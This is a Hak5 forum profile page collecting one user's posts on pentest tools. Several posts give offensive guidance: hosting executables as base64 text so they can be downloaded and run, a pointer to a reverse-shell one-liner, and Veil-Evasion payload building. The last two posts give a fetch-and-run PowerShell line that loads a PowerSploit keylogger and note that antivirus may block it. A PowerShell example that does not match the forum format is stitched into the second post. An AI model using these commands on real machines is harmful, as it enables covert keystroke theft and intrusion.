Hak5 Forums

PoSHMagiC0de

Active Members
  • Content count: 439
  • Days Won: 9

2 Followers

About PoSHMagiC0de

  • Rank
    Hak5 Pirate

Contact Methods

  • Website URL
    https://github.com/PoSHMagiC0de


  1. PoSHMagiC0de

    build EXE on target machine... (hardcode some info)

    There is a way to do this in pure PowerShell without calling csc, since it is .NET. You will have the option to compile to disk or in memory. Since I do most stuff in memory with reflection or Add-Type, I hardly use it. I have to look up the way for 2.0 PowerShell, but here is the "Add-Type" way. http://www.ingmarverheij.com/run-and-compile-net-code-in-res-workspace-manager-using-powershell/
  2. PoSHMagiC0de

    Good Free Hosting EXEs

    Instead of just giving the answer, the answer is the second answer here for handling binary files. I tried to find a page to discuss it, but everyone seems to be encoding text more than binary out there. https://stackoverflow.com/questions/42592518/encode-decode-exe-into-base64 The premise is this. You use the "[System.IO.File]::ReadAllBytes(<full path to binary>)" method from .NET to read all bytes of the binary, which will make a byte array, and then use [convert]::ToBase64String() to convert that to base64 and save that string to a text file to host. Your Posh script should download the contents of that text file and decode it from base64, and then you can write the bytes back out to the disk to run from disk as the original file or do whatever else you were going to do with it. If the file was text, like a script, you would use [System.IO.File]::ReadAllText(<full path to text file>) and then use "[System.Text.Encoding]::ASCII.GetBytes(<string object>)" to convert to bytes to encode in base64. If you plan on using the .NET functions, note that they do not take relative paths to files as parameters, so you will have to use the full path to the file when reading them in. "$(Resolve-Path -Path <relative path to file>).path" can be used to convert a relative path to a full path before passing it to the .NET functions.
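    The round trip described in the post above, written out as an added example (this is not code from the post or from any project it mentions). It builds a constructed sample file, encodes it to a base64 text file with the same .NET calls the post names, decodes it back, and verifies with a SHA-256 hash that nothing was corrupted in transit; the file names are placeholders under $env:TEMP. The last check is the defender's side of the same technique: a Windows PE image starts with the bytes "MZ", so its base64 text starts with "TVqQ", a prefix worth flagging in content inspection of hosted or downloaded text blobs.

```powershell
# Added example: base64 round-trip of a binary file with integrity check.
# Placeholder paths (assumption, not from the post):
$InputFile  = "$env:TEMP\sample.bin"
$TextFile   = "$env:TEMP\sample.b64.txt"
$OutputFile = "$env:TEMP\sample.restored.bin"

# Constructed sample input so the script runs offline: 4 KiB of random bytes.
$rng    = [System.Security.Cryptography.RandomNumberGenerator]::Create()
$sample = New-Object byte[] 4096
$rng.GetBytes($sample)
[System.IO.File]::WriteAllBytes($InputFile, $sample)

# Encode: the .NET file methods need absolute paths, so resolve first.
$fullIn = (Resolve-Path -Path $InputFile).Path
$bytes  = [System.IO.File]::ReadAllBytes($fullIn)
$b64    = [Convert]::ToBase64String($bytes)
[System.IO.File]::WriteAllText($TextFile, $b64)

# Decode: read the text back, restore the byte array, write it out.
$fullTxt  = (Resolve-Path -Path $TextFile).Path
$text     = [System.IO.File]::ReadAllText($fullTxt)
$restored = [Convert]::FromBase64String($text)
[System.IO.File]::WriteAllBytes($OutputFile, $restored)

# Verify: the two hashes must match, otherwise the transfer corrupted the file.
$h1 = (Get-FileHash -Algorithm SHA256 -Path $InputFile).Hash
$h2 = (Get-FileHash -Algorithm SHA256 -Path $OutputFile).Hash
if ($h1 -ne $h2) { throw "Round-trip failed: hash mismatch ($h1 vs $h2)" }
"Round-trip OK, SHA256 $h2"

# Defender check: bytes 4D 5A ('MZ') at offset 0 always encode to the text
# prefix 'TVqQ', so a text file starting that way is a base64-encoded PE image.
if ($b64.StartsWith('TVqQ')) {
    Write-Warning 'Text blob starts with TVqQ: looks like a base64-encoded PE image'
}
```

    The constructed sample is random, so the PE warning will not fire here; point $InputFile at any real EXE or DLL and it will.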
  3. PoSHMagiC0de

    Loot Folder / ATTACKMODE HID STORAGE ISSUE

    Because it is not behaving like a USB storage device but like storage on a separate computer that is on the same, separate subnet as the victim.
  4. PoSHMagiC0de

    Loot Folder / ATTACKMODE HID STORAGE ISSUE

    Ahh, the Storage/USB issue again. Not really an issue, just the way USB storage works. Let us call the bashbunny the host for the USB storage and the PC it is connected to the client, for simplicity's sake. If the client mounts the usb storage (the attackmode storage) and the host makes changes, then the client will not see them. For those to be seen you could unmount and remount the storage (turning all attackmodes off and on again with attackmode and then attackmode storage). The storage has to be resynced. In linux this might be possible with the "sync" command, but I have not tried it. Usually during setup I do all the folder creation the host is going to do before setting the attackmode. Next, if the client writes or makes changes to the storage, the guest may not see the changes until they are synced... or on windows the bunny has to be ejected before the host will see the changes. This is the explanation why some payloads that use storage and look for changes in the file done by the client are not seen, so never complete. I think this topic has been beaten to death over the threads hehehe.
  5. PoSHMagiC0de

    Good Free Hosting EXEs

    Welp, you can always get a vps and host it. Or better yet, instead of everyone looking for hosting for exe files, why not base64 encode it and store it as a txt file. Download that string, convert back to bytes and then write to drive or memory and execute.
  6. PoSHMagiC0de

    John the Ripper

    Hashcat requires a GPU or a CPU that supports ICD. The BB has neither, so hashcat will not run. John would, though, but slow, seeing the BB CPU is not the same as a laptop or desktop CPU. It will get very hot too. Best bet is to boot with a kali live USB on that machine, mount the drive, if you can, or crack the drive with john. If the server has a GPU then install the drivers in the live environment and use hashcat.
  7. PoSHMagiC0de

    Trouble Getting Veil-Evasion to Work

    You might have to apt install python-crypto. If the pip install did not get it then it is an apt package you will need.
  8. PoSHMagiC0de

    Shell (via. PuTTY) "dir" and "ls" listing issues?

    Ahh, new to Linux and SSH? When you first SSH in you end up in the root user folder, which is /root or "~/". If you notice your prompt for your first few commands, it has "~#" preceding it. You are in root's home folder there, or the current user's home folder, which is root. After your "cd /tools" you may notice that the prompt changed to "/tools#". You are in the tools folder off of the root folder, not the root home folder. If you type "cd /" and do an ls you will see everything installed on the root partition of the bunny. Pretty much, when you SSH in, do not expect to see what you see when you are in arming mode on the bunny and browsing it like a USB stick. That is a mounted partition, not the root. You will also notice the udisk folder is empty. It is not mounted yet to view it. "udisk mount" will mount it, and then you can view it under /root/udisk or "~/udisk", which will show your loot, payloads, etc. folders. The main root partition is the system files for the bunny; mess up those and bunny no workie at all.
  9. PoSHMagiC0de

    Impacket's karmasmb.py info

    I figured out what my issue was. I was trying to use it like smbserver.py. All the path parameters have to be full paths, not relative. Also, explorer will not work right with it. I used Powershell to get the contents of the paths and was able to get them. Also, if the extension is recognized by Windows you can use the run line to get it, like the txt file I pulled, and it opened notepad to display it. So, it is working now. 🙂
  10. PoSHMagiC0de

    Impacket's karmasmb.py info

    Welp, it is my turn to ask a question. Been a minute hahaha. So, once in a while I go through the impacket packages and mess with them from time to time and even go through their code (they are examples after all). One tool has me stumped, as I have yet to get it going right. That is karmasmb.py. I know it is similar to smbserver.py but with some differences. It takes a config file to resolve extensions and all that jazz. I have tried to use it like smbserver.py but get errors going to the folder on a windows machine, though it does show a connection coming in on karmasmb; it just serves the wrong stuff, and if I just browse to it I end up in a folder with a * in it. Tried the config file method too but getting the same issues. I am curious in seeing how this module works. Anyone have a working example so I can get a feel of how it is configured and ran? Yeah, I looked online. I think there is a video of Mubix using it for an exploit from back in 2015, but he already had it configured and just ran it. 😐
  11. PoSHMagiC0de

    Reverse shell windows question

    It is from Nishang. Here is the link to a git that shows 2 different ones. I believe he is using the bottom one. Change IP and port. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
  12. PoSHMagiC0de

    Trouble Getting Veil-Evasion to Work

    Oh crap, I didn't see you had ParrotOS installed. Yeah, prepare for the pain. I just saw Kali and figured you had Kali. What is hurting you here is Firejail. I used to run ParrotOS for about a year and then dropped it because they are really focused on anonymity, which a lot of times breaks the pen tools. To fix certain pen tools and veil you have two choices. One, you can run veil and tell firejail to not jail it (I forgot the commandline for that, might have to ask on the ParrotSec forums), or do what I did and remove firejail with apt remove --purge firejail. Once you do that, you will have to redo veil, but I would remove the git one if you got it, just because the apt one didn't work. If you prefer the git one, have it rerun its installer again after you took care of firejail, either by running the installer with the commandline to not firejail it or after you removed firejail.
  13. PoSHMagiC0de

    Trouble Getting Veil-Evasion to Work

    Okay, on my VM I did not have veil-evasion on. I did the following and veil works.

        dpkg --add-architecture i386
        apt update
        apt upgrade
        apt dist-upgrade
        apt autoremove
        reboot -n
        #above I updated everything because my VM was behind but made sure I had the i386 architecture added first.
        #after reboot and logon.
        apt update
        apt install wine
        apt install veil-evasion
        veil

    I told it to install with "Y". I reinstalled all the Windows apps for python, ruby, etc., overwriting when I had to. When done I was in veil and I created a regular https payload using hyperion and default pyinstaller. It got done with no errors. If you have not done so, make veil reinstall/reset so you can reinstall the dependencies. If having issues resetting, then apt remove --purge veil-evasion and then re apt install it. Now if you installed veil from git, well, you will have to figure out how to completely remove it to reinstall it or the one from apt.
  14. PoSHMagiC0de

    Powershell keylogger in seconds

    Nope, what I am doing here is helping you troubleshoot the payload, so first take the Rubber Ducky or Bash Bunny and put it in the drawer. Ignore it for now. What you are going to have to do is verify the payload works without the RD or BB. If it doesn't work without it on your test machine then it definitely will not work being launched from the device. So, above I was trying to have you just jump on your test machine. Run powershell and just use the two line commands I put out. The first will download and launch the get-keystrokes function to memory for use. Second and third was to run get-keystrokes as default, which should write the key.log file to your temp folder on your machine, or use the second get-keystrokes command with a path to have it write to your desktop so you know where it should be. I would do the second one, so if it works you should get a key.txt right on your desktop that should start populating with keystrokes. If you get nothing, something is wrong, but at least you may get an error message if it does. If get-keystrokes doesn't run (which is the actual keylogger) then you will get nothing in email. So, ignore the RD for now until you know the scripts work. Now if it does, then try and run the payload by hand. That means playing out by hand what the payload does to see if everything works.
  15. PoSHMagiC0de

    Powershell keylogger in seconds

    Sorry, just the Get-Keystrokes.ps1 script. Download it locally if you have to. By default, if run on its own with no parameters, it should create a key.log in the temp folder. The line below in the payload.txt changes that to key.txt if run with it.

        STRING Get-Keystrokes -LogPath $env:temp\key.txt

    So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log. The test should look like below: run powershell and then run each line.

        IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
        #For Default path.
        Get-Keystrokes
        #To place it on your desktop do and look for keylog.txt to popup.
        Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)

    It runs in a runspace, so PS will return once it starts running. You can add the param -PassThru to get a copy of the runspace to look at too. With that you can stop it, or closing the Powershell window will do the same, I believe. I have to test. I do not have my test machine up to test, so going off of what I read inside all the scripts. Might want to check your AV too. The keylogger comes from Powersploit, which is known by the AV authors, so it might be getting blocked.